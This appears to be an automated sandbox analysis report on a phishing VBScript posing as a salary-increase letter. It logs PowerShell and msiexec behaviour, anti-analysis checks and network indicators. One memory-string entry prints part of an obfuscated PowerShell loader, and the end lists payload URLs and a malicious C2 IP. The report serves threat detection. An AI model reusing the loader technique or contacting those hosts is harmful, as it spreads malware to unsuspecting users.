Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4203	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5707	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6783	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3050	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 8084	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120	Thread sleep count: 3985 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120	Thread sleep time: -11955000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120	Thread sleep count: 5428 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120	Thread sleep time: -16284000s >= -30000s	Jump to behavior

Source: wscript.exe, 00000002.00000003.1300081099.000001C352072000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000002.00000003.1300887888.000001C353F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000002.00000003.1286738829.000001C35205E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1299751234.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1283744742.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301884646.000001C352086000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1286961457.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300303733.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1302102291.000001C353FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C352085000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287735795.000001C352086000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1299614264.000001C352082000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449131027.000001B5ECD00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000003.1300887888.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1302102291.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301163298.000001C353F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ce for the Hyper-V hypervisor to provide per-partition perfoB
Source: wscript.exe, 00000002.00000003.1300887888.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1302102291.000001C353F72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301163298.000001C353F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1003ce for the Hyper-V hypervisor to provide per-partition perfoB
Source: wscript.exe, 00000002.00000003.1300303733.000001C353F77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: Yara match	File source: amsi64_5936.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6368, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
154.216.17.14	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
172.67.128.117	ln6b9.shop	United States	13335	CLOUDFLARENETUS	false

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
geoplugin.net	178.237.33.50	true
ln6b9.shop	172.67.128.117	true

Name	Malicious	Antivirus Detection	Reputation
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32	false		unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
154.216.17.14	true		unknown
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin	false		unknown

ID:	1533043
Product:	CloudBasic
Start time:	11:05:11
Start date:	14.10.2024
Sample:	Salary Increase Letter_Oct 2024.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	487fcfcc1cb2d0a2f46618ee515bd75f
SHA1:	946401dfded730d640409b73842063ec9d341367
SHA256:	46e052d1dcd2455c656a4f96ce8a6ab32d0c3b4cdc151094df100b0c14b1ba64
